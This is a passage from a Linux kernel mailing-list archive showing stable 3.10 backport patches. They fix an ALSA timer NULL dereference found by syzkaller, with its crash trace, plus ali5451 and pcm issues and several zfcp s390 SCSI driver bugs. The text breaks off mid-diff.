                   ` (25 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting Willy Tarreau
                   ` (191 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, Takashi Iwai, Jiri Slaby, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 8ddc05638ee42b18ba4fe99b5fb647fa3ad20456 upstream.

I hit this with syzkaller:

    kasan: CONFIG_KASAN_INLINE enabled
    kasan: GPF could be caused by NULL-ptr deref or user memory access
    general protection fault: 0000 [#1] PREEMPT SMP KASAN
    CPU: 0 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #190
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
    task: ffff88011278d600 task.stack: ffff8801120c0000
    RIP: 0010:[<ffffffff82c8ba07>]  [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
    RSP: 0018:ffff8801120c7a60  EFLAGS: 00010006
    RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000007
    RDX: 0000000000000009 RSI: 1ffff10023483091 RDI: 0000000000000048
    RBP: ffff8801120c7a78 R08: ffff88011a5cf768 R09: ffff88011a5ba790
    R10: 0000000000000002 R11: ffffed00234b9ef1 R12: ffff880114843980
    R13: ffffffff84213c00 R14: ffff880114843ab0 R15: 0000000000000286
    FS:  00007f72958f3700(0000) GS:ffff88011aa00000(0000) knlGS:0000000000000000
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 0000000000603001 CR3: 00000001126ab000 CR4: 00000000000006f0
    Stack:
     ffff880114843980 ffff880111eb2dc0 ffff880114843a34 ffff8801120c7ad0
     ffffffff82c81ab1 0000000000000000 ffffffff842138e0 0000000100000000
     ffff880111eb2dd0 ffff880111eb2dc0 0000000000000001 ffff880111eb2dc0
    Call Trace:
     [<ffffffff82c81ab1>] snd_timer_start1+0x331/0x670
     [<ffffffff82c85bfd>] snd_timer_start+0x5d/0xa0
     [<ffffffff82c8795e>] snd_timer_user_ioctl+0x88e/0x2830
     [<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
     [<ffffffff8132762f>] ? put_prev_entity+0x108f/0x21a0
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
     [<ffffffff813510af>] ? cpuacct_account_field+0x12f/0x1a0
     [<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
     [<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
     [<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
     [<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
     [<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
     [<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
     [<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
     [<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
     [<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
     [<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
    Code: c7 c7 c4 b9 c8 82 48 89 d9 4c 89 ee e8 63 88 7f fe e8 7e 46 7b fe 48 8d 7b 48 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 04 84 c0 7e 65 80 7b 48 00 74 0e e8 52 46
    RIP  [<ffffffff82c8ba07>] snd_hrtimer_start+0x77/0x100
     RSP <ffff8801120c7a60>
    ---[ end trace 5955b08db7f2b029 ]---

This can happen if snd_hrtimer_open() fails to allocate memory and
returns an error, which is currently not checked by snd_timer_open():

    ioctl(SNDRV_TIMER_IOCTL_SELECT)
     - snd_timer_user_tselect()
	- snd_timer_close()
	   - snd_hrtimer_close()
	      - (struct snd_timer *) t->private_data = NULL
        - snd_timer_open()
           - snd_hrtimer_open()
              - kzalloc() fails; t->private_data is still NULL

    ioctl(SNDRV_TIMER_IOCTL_START)
     - snd_timer_user_start()
	- snd_timer_start()
	   - snd_timer_start1()
	      - snd_hrtimer_start()
		- t->private_data == NULL // boom

[js] no put_device in 3.12 yet

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/timer.c | 15 +++++++++++++--
 1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f297eac..749857a 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -291,8 +291,19 @@ int snd_timer_open(struct snd_timer_instance **ti,
 	}
 	timeri->slave_class = tid->dev_sclass;
 	timeri->slave_id = slave_id;
-	if (list_empty(&timer->open_list_head) && timer->hw.open)
-		timer->hw.open(timer);
+
+	if (list_empty(&timer->open_list_head) && timer->hw.open) {
+		int err = timer->hw.open(timer);
+		if (err) {
+			kfree(timeri->owner);
+			kfree(timeri);
+
+			module_put(timer->module);
+			mutex_unlock(&register_mutex);
+			return err;
+		}
+	}
+
 	list_add_tail(&timeri->open_list, &timer->open_list_head);
 	snd_timer_check_master(timeri);
 	mutex_unlock(&register_mutex);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (26 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock Willy Tarreau
                   ` (190 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Takashi Iwai, Willy Tarreau

From: Takashi Iwai <tiwai@suse.de>

commit db68577966abc1aeae4ec597b3dcfa0d56e92041 upstream.

The pointer callbacks of ali5451 driver may return the value at the
boundary occasionally, and it results in the kernel warning like
  snd_ali5451 0000:00:06.0: BUG: , pos = 16384, buffer size = 16384, period size = 1024

It seems that folding the position offset is enough for fixing the
warning and no ill-effect has been seen by that.

Reported-by: Enrico Mioso <mrkiko.rs@gmail.com>
Tested-by: Enrico Mioso <mrkiko.rs@gmail.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/pci/ali5451/ali5451.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/sound/pci/ali5451/ali5451.c b/sound/pci/ali5451/ali5451.c
index 53754f5..097c8c4 100644
--- a/sound/pci/ali5451/ali5451.c
+++ b/sound/pci/ali5451/ali5451.c
@@ -1422,6 +1422,7 @@ snd_ali_playback_pointer(struct snd_pcm_substream *substream)
 	spin_unlock(&codec->reg_lock);
 	snd_ali_printk("playback pointer returned cso=%xh.\n", cso);
 
+	cso %= runtime->buffer_size;
 	return cso;
 }
 
@@ -1442,6 +1443,7 @@ static snd_pcm_uframes_t snd_ali_pointer(struct snd_pcm_substream *substream)
 	cso = inw(ALI_REG(codec, ALI_CSO_ALPHA_FMS + 2));
 	spin_unlock(&codec->reg_lock);
 
+	cso %= runtime->buffer_size;
 	return cso;
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (27 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 130/319] zfcp: fix fc_host port_type with NPIV Willy Tarreau
                   ` (189 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Takashi Iwai, Willy Tarreau

From: Takashi Iwai <tiwai@suse.de>

commit 3aa02cb664c5fb1042958c8d1aa8c35055a2ebc4 upstream.

Currently kill_fasync() is called outside the stream lock in
snd_pcm_period_elapsed().  This is potentially racy, since the stream
may get released even during the irq handler is running.  Although
snd_pcm_release_substream() calls snd_pcm_drop(), this doesn't
guarantee that the irq handler finishes, thus the kill_fasync() call
outside the stream spin lock may be invoked after the substream is
detached, as recently reported by KASAN.

As a quick workaround, move kill_fasync() call inside the stream
lock.  The fasync is rarely used interface, so this shouldn't have a
big impact from the performance POV.

Ideally, we should implement some sync mechanism for the proper finish
of stream and irq handler.  But this oneliner should suffice for most
cases, so far.

Reported-by: Baozeng Ding <sploving1@gmail.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/pcm_lib.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c
index 8eddece..dfed3ef 100644
--- a/sound/core/pcm_lib.c
+++ b/sound/core/pcm_lib.c
@@ -1856,10 +1856,10 @@ void snd_pcm_period_elapsed(struct snd_pcm_substream *substream)
 	if (substream->timer_running)
 		snd_timer_interrupt(substream->timer, 1);
  _end:
+	kill_fasync(&runtime->fasync, SIGIO, POLL_IN);
 	snd_pcm_stream_unlock_irqrestore(substream, flags);
 	if (runtime->transfer_ack_end)
 		runtime->transfer_ack_end(substream);
-	kill_fasync(&runtime->fasync, SIGIO, POLL_IN);
 }
 
 EXPORT_SYMBOL(snd_pcm_period_elapsed);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 130/319] zfcp: fix fc_host port_type with NPIV
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (28 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 131/319] zfcp: fix ELS/GS request&response length for hardware data router Willy Tarreau
                   ` (188 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit bd77befa5bcff8c51613de271913639edf85fbc2 upstream.

For an NPIV-enabled FCP device, zfcp can erroneously show
"NPort (fabric via point-to-point)" instead of "NPIV VPORT"
for the port_type sysfs attribute of the corresponding
fc_host.
s390-tools that can be affected are dbginfo.sh and ziomon.

zfcp_fsf_exchange_config_evaluate() ignores
fsf_qtcb_bottom_config.connection_features indicating NPIV
and only sets fc_host_port_type to FC_PORTTYPE_NPORT if
fsf_qtcb_bottom_config.fc_topology is FSF_TOPO_FABRIC.

Only the independent zfcp_fsf_exchange_port_evaluate()
evaluates connection_features to overwrite fc_host_port_type
to FC_PORTTYPE_NPIV in case of NPIV.
Code was introduced with upstream kernel 2.6.30
commit 0282985da5923fa6365adcc1a1586ae0c13c1617
("[SCSI] zfcp: Report fc_host_port_type as NPIV").

This works during FCP device recovery (such as set online)
because it performs FSF_QTCB_EXCHANGE_CONFIG_DATA followed by
FSF_QTCB_EXCHANGE_PORT_DATA in sequence.

However, the zfcp-specific scsi host sysfs attributes
"requests", "megabytes", or "seconds_active" trigger only
zfcp_fsf_exchange_config_evaluate() resetting fc_host
port_type to FC_PORTTYPE_NPORT despite NPIV.

The zfcp-specific scsi host sysfs attribute "utilization"
triggers only zfcp_fsf_exchange_port_evaluate() correcting
the fc_host port_type again in case of NPIV.

Evaluate fsf_qtcb_bottom_config.connection_features
in zfcp_fsf_exchange_config_evaluate() where it belongs to.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 0282985da592 ("[SCSI] zfcp: Report fc_host_port_type as NPIV")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_fsf.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 9152999..8fa6bc4 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -3,7 +3,7 @@
  *
  * Implementation of FSF commands.
  *
- * Copyright IBM Corp. 2002, 2013
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -513,7 +513,10 @@ static int zfcp_fsf_exchange_config_evaluate(struct zfcp_fsf_req *req)
 		fc_host_port_type(shost) = FC_PORTTYPE_PTP;
 		break;
 	case FSF_TOPO_FABRIC:
-		fc_host_port_type(shost) = FC_PORTTYPE_NPORT;
+		if (bottom->connection_features & FSF_FEATURE_NPIV_MODE)
+			fc_host_port_type(shost) = FC_PORTTYPE_NPIV;
+		else
+			fc_host_port_type(shost) = FC_PORTTYPE_NPORT;
 		break;
 	case FSF_TOPO_AL:
 		fc_host_port_type(shost) = FC_PORTTYPE_NLPORT;
@@ -618,7 +621,6 @@ static void zfcp_fsf_exchange_port_evaluate(struct zfcp_fsf_req *req)
 
 	if (adapter->connection_features & FSF_FEATURE_NPIV_MODE) {
 		fc_host_permanent_port_name(shost) = bottom->wwpn;
-		fc_host_port_type(shost) = FC_PORTTYPE_NPIV;
 	} else
 		fc_host_permanent_port_name(shost) = fc_host_port_name(shost);
 	fc_host_maxframe_size(shost) = bottom->maximum_frame_size;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 131/319] zfcp: fix ELS/GS request&response length for hardware data router
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (29 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 130/319] zfcp: fix fc_host port_type with NPIV Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 132/319] zfcp: close window with unblocked rport during rport gone Willy Tarreau
                   ` (187 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 70369f8e15b220f50a16348c79a61d3f7054813c upstream.

In the hardware data router case, introduced with kernel 3.2
commit 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
the ELS/GS request&response length needs to be initialized
as in the chained SBAL case.

Otherwise, the FCP channel rejects ELS requests with
FSF_REQUEST_SIZE_TOO_LARGE.

Such ELS requests can be issued by user space through BSG / HBA API,
or zfcp itself uses ADISC ELS for remote port link test on RSCN.
The latter can cause a short path outage due to
unnecessary remote target port recovery because the always
failing ADISC cannot detect extremely short path interruptions
beyond the local FCP channel.

Below example is decoded with zfcpdbf from s390-tools:

Timestamp      : ...
Area           : SAN
Subarea        : 00
Level          : 1
Exception      : -
CPU id         : ..
Caller         : zfcp_dbf_san_req+0408
Record id      : 1
Tag            : fssels1
Request id     : 0x<reqid>
Destination ID : 0x00<target d_id>
Payload info   : 52000000 00000000 <our wwpn       >           [ADISC]
                 <our wwnn       > 00<s_id> 00000000
                 00000000 00000000 00000000 00000000

Timestamp      : ...
Area           : HBA
Subarea        : 00
Level          : 1
Exception      : -
CPU id         : ..
Caller         : zfcp_dbf_hba_fsf_res+0740
Record id      : 1
Tag            : fs_ferr
Request id     : 0x<reqid>
Request status : 0x00000010
FSF cmnd       : 0x0000000b               [FSF_QTCB_SEND_ELS]
FSF sequence no: 0x...
FSF issued     : ...
FSF stat       : 0x00000061		  [FSF_REQUEST_SIZE_TOO_LARGE]
FSF stat qual  : 00000000 00000000 00000000 00000000
Prot stat      : 0x00000100
Prot stat qual : 00000000 00000000 00000000 00000000

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_fsf.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8fa6bc4..8e0979c 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -990,8 +990,12 @@ static int zfcp_fsf_setup_ct_els_sbals(struct zfcp_fsf_req *req,
 	if (zfcp_adapter_multi_buffer_active(adapter)) {
 		if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_req))
 			return -EIO;
+		qtcb->bottom.support.req_buf_length =
+			zfcp_qdio_real_bytes(sg_req);
 		if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_resp))
 			return -EIO;
+		qtcb->bottom.support.resp_buf_length =
+			zfcp_qdio_real_bytes(sg_resp);
 
 		zfcp_qdio_set_data_div(qdio, &req->qdio_req,
 					zfcp_qdio_sbale_count(sg_req));
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 132/319] zfcp: close window with unblocked rport during rport gone
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (30 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 131/319] zfcp: fix ELS/GS request&response length for hardware data router Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 133/319] zfcp: retain trace level for SCSI and HBA FSF response records Willy Tarreau
                   ` (186 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 4eeaa4f3f1d6c47b69f70e222297a4df4743363e upstream.

On a successful end of reopen port forced,
zfcp_erp_strategy_followup_success() re-uses the port erp_action
and the subsequent zfcp_erp_action_cleanup() now
sees ZFCP_ERP_SUCCEEDED with
erp_action->action==ZFCP_ERP_ACTION_REOPEN_PORT
instead of ZFCP_ERP_ACTION_REOPEN_PORT_FORCED
but must not perform zfcp_scsi_schedule_rport_register().

We can detect this because the fresh port reopen erp_action
is in its very first step ZFCP_ERP_STEP_UNINITIALIZED.

Otherwise this opens a time window with unblocked rport
(until the followup port reopen recovery would block it again).
If a scsi_cmnd timeout occurs during this time window
fc_timed_out() cannot work as desired and such command
would indeed time out and trigger scsi_eh. This prevents
a clean and timely path failover.
This should not happen if the path issue can be recovered
on FC transport layer such as path issues involving RSCNs.

Also, unnecessary and repeated DID_IMM_RETRY for pending and
undesired new requests occur because internally zfcp still
has its zfcp_port blocked.

As follow-on errors with scsi_eh, it can cause,
in the worst case, permanently lost paths due to one of:
sd <scsidev>: [<scsidisk>] Medium access timeout failure. Offlining disk!
sd <scsidev>: Device offlined - not ready after error recovery

For fix validation and to aid future debugging with other recoveries
we now also trace (un)blocking of rports.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 5767620c383a ("[SCSI] zfcp: Do not unblock rport from REOPEN_PORT_FORCED")
Fixes: a2fa0aede07c ("[SCSI] zfcp: Block FC transport rports early on errors")
Fixes: 5f852be9e11d ("[SCSI] zfcp: Fix deadlock between zfcp ERP and SCSI")
Fixes: 338151e06608 ("[SCSI] zfcp: make use of fc_remote_port_delete when target port is unavailable")
Fixes: 3859f6a248cb ("[PATCH] zfcp: add rports to enable scsi_add_device to work again")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.h  |  7 ++++++-
 drivers/s390/scsi/zfcp_erp.c  | 12 +++++++++---
 drivers/s390/scsi/zfcp_scsi.c |  8 +++++++-
 3 files changed, 22 insertions(+), 5 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index 3ac7a4b..b5afa3d 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -2,7 +2,7 @@
  * zfcp device driver
  * debug feature declarations
  *
- * Copyright IBM Corp. 2008, 2010
+ * Copyright IBM Corp. 2008, 2015
  */
 
 #ifndef ZFCP_DBF_H
@@ -17,6 +17,11 @@
 
 #define ZFCP_DBF_INVALID_LUN	0xFFFFFFFFFFFFFFFFull
 
+enum zfcp_dbf_pseudo_erp_act_type {
+	ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD = 0xff,
+	ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL = 0xfe,
+};
+
 /**
  * struct zfcp_dbf_rec_trigger - trace record for triggered recovery action
  * @ready: number of ready recovery actions
diff --git a/drivers/s390/scsi/zfcp_erp.c b/drivers/s390/scsi/zfcp_erp.c
index 8e8f353..b4cd26d 100644
--- a/drivers/s390/scsi/zfcp_erp.c
+++ b/drivers/s390/scsi/zfcp_erp.c
@@ -3,7 +3,7 @@
  *
  * Error Recovery Procedures (ERP).
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -1225,8 +1225,14 @@ static void zfcp_erp_action_cleanup(struct zfcp_erp_action *act, int result)
 		break;
 
 	case ZFCP_ERP_ACTION_REOPEN_PORT:
-		if (result == ZFCP_ERP_SUCCEEDED)
-			zfcp_scsi_schedule_rport_register(port);
+		/* This switch case might also happen after a forced reopen
+		 * was successfully done and thus overwritten with a new
+		 * non-forced reopen at `ersfs_2'. In this case, we must not
+		 * do the clean-up of the non-forced version.
+		 */
+		if (act->step != ZFCP_ERP_STEP_UNINITIALIZED)
+			if (result == ZFCP_ERP_SUCCEEDED)
+				zfcp_scsi_schedule_rport_register(port);
 		/* fall through */
 	case ZFCP_ERP_ACTION_REOPEN_PORT_FORCED:
 		put_device(&port->dev);
diff --git a/drivers/s390/scsi/zfcp_scsi.c b/drivers/s390/scsi/zfcp_scsi.c
index 7b35364..38ee0df 100644
--- a/drivers/s390/scsi/zfcp_scsi.c
+++ b/drivers/s390/scsi/zfcp_scsi.c
@@ -3,7 +3,7 @@
  *
  * Interface to Linux SCSI midlayer.
  *
- * Copyright IBM Corp. 2002, 2013
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -577,6 +577,9 @@ static void zfcp_scsi_rport_register(struct zfcp_port *port)
 	ids.port_id = port->d_id;
 	ids.roles = FC_RPORT_ROLE_FCP_TARGET;
 
+	zfcp_dbf_rec_trig("scpaddy", port->adapter, port, NULL,
+			  ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD,
+			  ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD);
 	rport = fc_remote_port_add(port->adapter->scsi_host, 0, &ids);
 	if (!rport) {
 		dev_err(&port->adapter->ccw_device->dev,
@@ -598,6 +601,9 @@ static void zfcp_scsi_rport_block(struct zfcp_port *port)
 	struct fc_rport *rport = port->rport;
 
 	if (rport) {
+		zfcp_dbf_rec_trig("scpdely", port->adapter, port, NULL,
+				  ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL,
+				  ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL);
 		fc_remote_port_delete(rport);
 		port->rport = NULL;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 133/319] zfcp: retain trace level for SCSI and HBA FSF response records
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (31 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 132/319] zfcp: close window with unblocked rport during rport gone Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 134/319] zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace Willy Tarreau
                   ` (185 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 35f040df97fa0e94c7851c054ec71533c88b4b81 upstream.

While retaining the actual filtering according to trace level,
the following commits started to write such filtered records
with a hardcoded record level of 1 instead of the actual record level:
commit 250a1352b95e1db3216e5c5d4f4365bea5122f4a
("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
commit a54ca0f62f953898b05549391ac2a8a4dad6482b
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")

Now we can distinguish written records again for offline level filtering.

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 250a1352b95e ("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 11 ++++++-----
 drivers/s390/scsi/zfcp_dbf.h |  4 ++--
 drivers/s390/scsi/zfcp_ext.h |  7 ++++---
 3 files changed, 12 insertions(+), 10 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index e1a8cc2..8f668c6 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -3,7 +3,7 @@
  *
  * Debug traces for zfcp.
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -58,7 +58,7 @@ void zfcp_dbf_pl_write(struct zfcp_dbf *dbf, void *data, u16 length, char *area,
  * @tag: tag indicating which kind of unsolicited status has been received
  * @req: request for which a response was received
  */
-void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req)
+void zfcp_dbf_hba_fsf_res(char *tag, int level, struct zfcp_fsf_req *req)
 {
 	struct zfcp_dbf *dbf = req->adapter->dbf;
 	struct fsf_qtcb_prefix *q_pref = &req->qtcb->prefix;
@@ -90,7 +90,7 @@ void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req)
 				  rec->pl_len, "fsf_res", req->req_id);
 	}
 
-	debug_event(dbf->hba, 1, rec, sizeof(*rec));
+	debug_event(dbf->hba, level, rec, sizeof(*rec));
 	spin_unlock_irqrestore(&dbf->hba_lock, flags);
 }
 
@@ -392,7 +392,8 @@ void zfcp_dbf_san_in_els(char *tag, struct zfcp_fsf_req *fsf)
  * @sc: pointer to struct scsi_cmnd
  * @fsf: pointer to struct zfcp_fsf_req
  */
-void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf)
+void zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *sc,
+		   struct zfcp_fsf_req *fsf)
 {
 	struct zfcp_adapter *adapter =
 		(struct zfcp_adapter *) sc->device->host->hostdata[0];
@@ -434,7 +435,7 @@ void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf)
 		}
 	}
 
-	debug_event(dbf->scsi, 1, rec, sizeof(*rec));
+	debug_event(dbf->scsi, level, rec, sizeof(*rec));
 	spin_unlock_irqrestore(&dbf->scsi_lock, flags);
 }
 
diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
